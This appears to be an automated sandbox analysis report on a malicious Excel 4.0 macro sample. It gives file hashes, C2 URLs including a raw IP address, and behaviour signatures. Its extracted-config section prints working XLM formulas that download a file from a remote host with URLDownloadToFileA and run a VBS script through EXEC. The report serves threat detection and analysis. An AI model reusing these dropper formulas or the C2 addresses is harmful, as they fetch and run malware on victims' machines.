General

  • Target

    11d1fa6a78c3765065c09a57de614c0d

  • Size

    6KB

  • Sample

    231221-193c8afac4

  • MD5

    11d1fa6a78c3765065c09a57de614c0d

  • SHA1

    540cec05cdc8851952ca37ffd1576febb3390ef4

  • SHA256

    91d0aa8a6ad5fc40de117e81b689949ed4d615af440323172f53c7cf9bc04af3

  • SHA512

    0484ada017d2fa3533a280aa10793597f7a394f071bfe5198cc1428a0641da3763b18826a4730fcb17d613aaaa54109af63360668ed65876da4bec747df078e6

  • SSDEEP

    192:NDSsuSibrA2OmmfRJ8UhHFBFYuXb98yIc90+oZ:NLu7M2wn1FYOb98yI2+Z

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      11d1fa6a78c3765065c09a57de614c0d

    • Size

      6KB

    • MD5

      11d1fa6a78c3765065c09a57de614c0d

    • SHA1

      540cec05cdc8851952ca37ffd1576febb3390ef4

    • SHA256

      91d0aa8a6ad5fc40de117e81b689949ed4d615af440323172f53c7cf9bc04af3

    • SHA512

      0484ada017d2fa3533a280aa10793597f7a394f071bfe5198cc1428a0641da3763b18826a4730fcb17d613aaaa54109af63360668ed65876da4bec747df078e6

    • SSDEEP

      192:NDSsuSibrA2OmmfRJ8UhHFBFYuXb98yIc90+oZ:NLu7M2wn1FYOb98yI2+Z

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks